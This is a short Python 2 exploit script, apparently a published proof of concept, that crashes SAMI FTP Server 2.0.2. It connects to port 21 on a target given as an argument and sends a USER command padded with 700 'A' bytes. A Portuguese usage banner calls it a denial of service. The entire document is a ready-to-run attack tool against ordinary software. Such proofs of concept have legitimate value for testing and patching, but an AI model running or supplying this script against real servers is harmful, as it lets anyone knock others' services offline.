#!/usr/bin/python # # e-mail: fernando.mengalli@gmail.com # # Date: 06/08/2021 - 08 jun # # Version Vulnerable: SAMI FTP Server 2.0.2 # # OS Tested: Windows XP PACK 3 Brazilian e Windows 2000 # import socket import sys if len(sys.argv) != 2: print "#####################################################################" print "# #" print "# SAMI FTP Server 2.0.2 - Command 'USER' Denied of Service #" print "# #" print "# Author: Fernando Mengali #" print "# #" print "# Modo de uso: exploit.py #" print "# #" print "#####################################################################" sys.exit(1) target = sys.argv[1] payload = "\x41"*700 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect = s.connect((target, 21)) print "[+] Conectado com sucesso" except: print "[-] Falha ao conectar para o servidor..." sys.exit(0) s.recv(1024) print "[+] Enviando pacote crafted..." s.send('USER '+payload+' \r\n') s.recv(1024) s.send('PASS anonymous \r\n') s.close()